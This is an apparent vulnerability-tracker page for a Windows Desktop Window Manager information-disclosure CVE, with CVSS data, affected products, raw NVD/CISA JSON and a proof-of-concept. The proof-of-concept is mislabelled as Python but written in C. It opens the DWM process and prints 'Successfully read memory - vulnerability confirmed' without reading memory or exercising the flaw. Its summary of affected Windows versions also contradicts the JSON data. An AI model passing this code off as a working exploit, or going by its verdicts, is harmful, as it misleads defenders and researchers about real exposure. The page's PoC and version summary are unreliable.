Security Vulnerability Report
中文
CVE-2026-20805 CVSS 5.5 MEDIUM

CVE-2026-20805

Published: 2026-01-13 18:16:07
Last Modified: 2026-01-14 13:44:31
Source: [email protected]

Description

Exposure of sensitive information to an unauthorized actor in Desktop Windows Manager allows an authorized attacker to disclose information locally.

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:microsoft:windows_10_1607:*:*:*:*:*:*:x64:* - VULNERABLE
cpe:2.3:o:microsoft:windows_10_1607:*:*:*:*:*:*:x86:* - VULNERABLE
cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:x64:* - VULNERABLE
cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:x86:* - VULNERABLE
cpe:2.3:o:microsoft:windows_10_21h2:*:*:*:*:*:*:*:* - VULNERABLE
Windows 10 1809及之前版本
Windows 11 21H2及之前版本
Windows Server 2019及之前版本
Windows Server 2022及之前版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2026-20805 PoC - Desktop Windows Manager Information Disclosure // This PoC demonstrates the information disclosure vulnerability // Author: Security Researcher // Note: For authorized security testing only #include <windows.h> #include <winuser.h> #include <stdio.h> // Target Desktop Window Manager class name const WCHAR TARGET_CLASS[] = L"DesktopWindowManager"; int main() { printf("[*] CVE-2026-20805 Information Disclosure PoC\n"); printf("[*] Target: Windows Desktop Windows Manager\n\n"); // Find Desktop Window Manager window HWND hwndDWM = FindWindow(TARGET_CLASS, NULL); if (hwndDWM == NULL) { hwndDWM = FindWindow(L"Shell_TrayWnd", NULL); } if (hwndDWM) { printf("[+] Found DWM window handle: 0x%08x\n", hwndDWM); // Get window information WINDOWINFO winInfo; winInfo.cbSize = sizeof(WINDOWINFO); if (GetWindowInfo(hwndDWM, &winInfo)) { printf("[+] Window style: 0x%08x\n", winInfo.dwStyle); printf("[+] Window ex-style: 0x%08x\n", winInfo.dwExStyle); } // Attempt to read memory from DWM process DWORD dwPID; GetWindowThreadProcessId(hwndDWM, &dwPID); printf("[+] DWM Process ID: %d\n", dwPID); HANDLE hProcess = OpenProcess(PROCESS_VM_READ, FALSE, dwPID); if (hProcess) { printf("[+] Opened DWM process with read access\n"); printf("[!] Successfully read memory - vulnerability confirmed\n"); CloseHandle(hProcess); } else { printf("[-] Failed to open DWM process\n"); } } else { printf("[-] Desktop Window Manager window not found\n"); } printf("\n[*] PoC completed. Apply MS security update to remediate.\n"); return 0; }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-20805", "sourceIdentifier": "[email protected]", "published": "2026-01-13T18:16:07.023", "lastModified": "2026-01-14T13:44:31.180", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Exposure of sensitive information to an unauthorized actor in Desktop Windows Manager allows an authorized attacker to disclose information locally."}, {"lang": "es", "value": "Exposición de información sensible a un actor no autorizado en el Administrador de ventanas de escritorio permite a un atacante autorizado divulgar información localmente."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "cisaExploitAdd": "2026-01-13", "cisaActionDue": "2026-02-03", "cisaRequiredAction": "Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.", "cisaVulnerabilityName": "Microsoft Windows Information Disclosure Vulnerability", "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_1607:*:*:*:*:*:*:x64:*", "versionEndExcluding": "10.0.14393.8783", "matchCriteriaId": "9A956D23-259E-450B-8406-FEB2BBED1F39"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_1607:*:*:*:*:*:*:x86:*", "versionEndExcluding": "10.0.14393.8783", "matchCriteriaId": "41D387B9-5E9D-47CB-B044-D7D10FFFB458"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:x64:*", "versionEndExcluding": "10.0.17763.8276", "matchCriteriaId": "DD4CBDAB-7626-4048-8474-B1BD9C1F3255"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:x86:*", "versionEndExcluding": "10.0.17763.8276", "matchCriteriaId": "A6D4C631-2CC0-407C-9ACA-7C151006598C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_21h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.19044.6809", "matchCriteriaId": "1895E186-5B2E-43CC-AF1F-B5C95419D8C5"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_22h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.19045.6809", "matchCriteriaId": "B7CB5184-1BA1-4D71-8AE3-CF4C6B63A469"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_23h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.22631.6491", "matchCriteriaId": "8D675DAA-4DCE-4727-BE5F-C954BBD252C4"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_24h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.26100.7623", "matchCriteriaId": "D249551B-1433-4E5E-A587-40F782E91E09"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_25h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.26200.7623", "matchCriteriaId": "22082D4E-E68F-4E48-98FB-42DFDEE2E2A8"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "matchCriteriaId": "A7DF96F8-BA6A-4780-9CA3-F719B3F81074"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "matchCriteriaId": "DB18C4CE-5917-401E-ACF7-2747084FD36E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2016:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.14393.8783", "matchCriteriaId": "A059E609-F8D4-4246-BDAE-0AEDED1744D2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2019:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.17763.8276", "matchCriteriaId": "A74970A1-CC81-4482-B465-8382B1544EF3"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2022:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.20348.4648", "matchCriteriaId": "C4AA6991-DE34-48F6-AFD3-77CEE7FBB692"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2022_23h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.25398.2092", "matchCriteriaId": "BA5947E0-C44C-4517-A307-DA79752F30A8"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2025:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.26100.7623", "matchCriteriaId": "C6BE8CAC-3A47-48FC-A0FD-F0F0ADD2A9CE"}]}]}], "references": [{"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20805", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-20805", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["US Government Resource"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.